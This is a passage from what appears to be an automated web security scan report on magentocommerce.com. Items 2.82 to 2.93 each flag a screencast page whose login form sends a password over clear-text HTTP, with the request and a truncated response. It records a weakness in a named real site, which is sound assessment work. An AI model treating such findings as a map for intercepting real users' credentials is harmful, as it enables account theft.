Date: Fri, 12 Aug 2011 15:07:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176054; expires=Sat, 11-Aug-2012 15:07:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Fscreencasts%2Fcurrency%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:35 GMT
Content-Length: 34872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.82. http://www.magentocommerce.com/media/screencasts/data-exporting/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/data-exporting/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/data-exporting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176046; expires=Sat, 11-Aug-2012 15:07:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Fscreencasts%2Fdata-exporting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:26 GMT
Content-Length: 34645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.83. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/designers-guide-1/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/designers-guide-1/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176026; expires=Sat, 11-Aug-2012 15:07:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Fscreencasts%2Fdesigners-guide-1%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:06 GMT
Content-Length: 37478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.84. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/gift-certificates-cards/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/gift-certificates-cards/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176002; expires=Sat, 11-Aug-2012 15:06:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fgift-certificates-cards%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:43 GMT
Content-Length: 33319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.85. http://www.magentocommerce.com/media/screencasts/grouped-products/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/grouped-products/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/grouped-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176154; expires=Sat, 11-Aug-2012 15:09:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fgrouped-products%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:15 GMT
Content-Length: 33124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.86. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/introducing-the-magento-enterprise-edition/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/introducing-the-magento-enterprise-edition/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175988; expires=Sat, 11-Aug-2012 15:06:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A67%3A%22%2Fmedia%2Fscreencasts%2Fintroducing-the-magento-enterprise-edition%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:28 GMT
Content-Length: 33321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.87. http://www.magentocommerce.com/media/screencasts/landing-pages/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/landing-pages/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/landing-pages/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176057; expires=Sat, 11-Aug-2012 15:07:37 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Flanding-pages%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:37 GMT
Content-Length: 36261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.88. http://www.magentocommerce.com/media/screencasts/permissions/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/permissions/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/permissions/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176026; expires=Sat, 11-Aug-2012 15:07:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Fscreencasts%2Fpermissions%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:06 GMT
Content-Length: 35264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.89. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176006; expires=Sat, 11-Aug-2012 15:06:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A99%3A%22%2Fmedia%2Fscreencasts%2Fprivate-sales-including-events-invitations-and-category-access-permissions%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:46 GMT
Content-Length: 33592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.90. http://www.magentocommerce.com/media/screencasts/product-comparison/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/product-comparison/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/product-comparison/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176058; expires=Sat, 11-Aug-2012 15:07:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fmedia%2Fscreencasts%2Fproduct-comparison%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:38 GMT
Content-Length: 33268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.91. http://www.magentocommerce.com/media/screencasts/search/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/search/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176092; expires=Sat, 11-Aug-2012 15:08:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Fscreencasts%2Fsearch%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:13 GMT
Content-Length: 33227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.92. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/single-page-checkout-guest-checkout/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/single-page-checkout-guest-checkout/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176174; expires=Sat, 11-Aug-2012 15:09:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fmedia%2Fscreencasts%2Fsingle-page-checkout-guest-checkout%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:34 GMT
Content-Length: 34173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.93. http://www.magentocommerce.com/media/screencasts/static-blocks/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/static-blocks/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/static-blocks/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176010; expires=Sat, 11-Aug-2012 15:06:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Fstatic-blocks%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:51 GMT
Content-Length: 34297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
